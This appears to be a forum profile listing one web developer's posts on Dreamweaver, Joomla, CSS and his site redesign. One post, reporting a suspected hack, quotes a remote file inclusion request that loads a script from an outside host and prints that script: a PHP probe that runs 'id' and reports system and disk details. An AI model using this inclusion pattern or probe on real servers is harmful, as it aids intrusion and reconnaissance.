Everything posted by Emmanuel
-
Need to edit some PHP. Image will explain more
Hi, Looks like you will need to locate the SQL code that generates the categories and the simply limit the number of results you want returned.
-
Loading in views with jQuery and CodeIgniter
You need to have some controllers in place. And does the website really have to be just one page? You will probably be making things a lot more difficult for yourself.
-
Hello from Glasgow !
Welcome to the site Gary.... Glad to see another glaswegian aboard
-
redesigning website layout
Thanks for the comment jlspurling. I am actually considering removing the ads on my site. Waste of valuable space them being there. As for the yellow in the search, that was the outcome of me using the firefox extension Screengrab.
-
redesigning website layout
I am in the process of redesigning my website layout. What do you think of the current design I have started with? Any fresh ideas would be very welcome... My current site layout is here http://www.grafikkaos.co.uk Thanks
-
Joomla help....
Anybody in here have experience in design components with Joomla? I have been trying to create a custom component based on SagePay VSP direct. But the Joomla MVC structure is giving me absolute headaches. I have managed to get the default view(which contains the form) to display trying to get another view to show up but all I keep getting is errors. On top of that, I am totally lost with where to put the SagePay code or as to formulate it properly. An expert's perspective would be very welcome here if possible....
-
My website design
Hi, also consider using CSS for your site layout. Frames will tend to make things a bit confusing and using tables for layout is so yesterday.
- SPAM ON HERE
-
Looking to add free newsletter functionality to site
Hi, you could have a look at PHPList. Its free and open-source.
-
Hacking attempt!?
Figured as much, just need to track the ip address...
-
How to stop someone from using IE
If they insist on liking IE, simply install the Aero Basic theme on Firefox to fool them into thinking they are actually using IE.. hehe
-
Hacking attempt!?
While taking a break from some work I was doing, I decide to have a look at the my website log. I do expect to receive the odd 404 errors but this time it was unusually high so i decided to take a closer. It seems to me that some has been attempting to have my website. I seem to have been getting quite a few lines such as this: /article/60-Creating-An-Advanced-CMS-Part-1//include/connect.php=http://www.madolddogs.de//flash/db/id2.txt When I decided to have a look at the id2.txt file, this is what it contained: <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "Osirys was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; So far, no pages on my website have been afftected or change in anyway... so I would assume that is a failed hacking attempt right!?
-
Dreamweaver CS4
well I think they have considerably improve on the UI. It was due an update anyway. The fact that they have also integrate the ability to work with other ajax frameworks makes it quite useful. Although I have CS4, I am sticking to CS3 for the time being until the Adobe Dreamweaver Developer Toolbox is update. The fact that it also it also integrates nicely with other Cs4 apps is pretty good as well!
-
Advanced light box.
Hi You could look at ShadowBox (http://mjijackson.com/shadowbox/). Its pretty good as a lightbox system and its the one I use all the time.
-
Dreamweaver - spry collapsible panel & repeating regions
Are you trying to display data from an xml file?
-
Professional web developers
someone pass me some pills... all those colors are making my head spin!!!
-
Dreamweaver problem help me :(
I actually did encounter this type of error a good while back when working on a client's website. I think dreamweaver has a general problem dealing with nested websites. If you have moved "mysite 3" to "c:\mysite 3", did u make sure to reconfigure the site settings?
-
Which Web Development Software Do You Use?
Dreamweaver Cs3 + Aptana Studio - IMO best combination!
-
Feedback
Hi, I got round to redesigning my website. Still have a few things to sort out on it but a feedback as to what you think of it at the moment would be appreciated. http://www.grafikkaos.co.uk Thanks, Emmanuel
-
First Design (newbie)
Looks like a pretty good and clean design to me! Keep up the good work!
-
Hello to everyone
Just dropping to say hello to everyone. The name is Emmanuel. I am a web developer based in Glasgow. Glad be part of this community. Looking forward to getting to know you all. My Website: http://www.grafikkaos.co.uk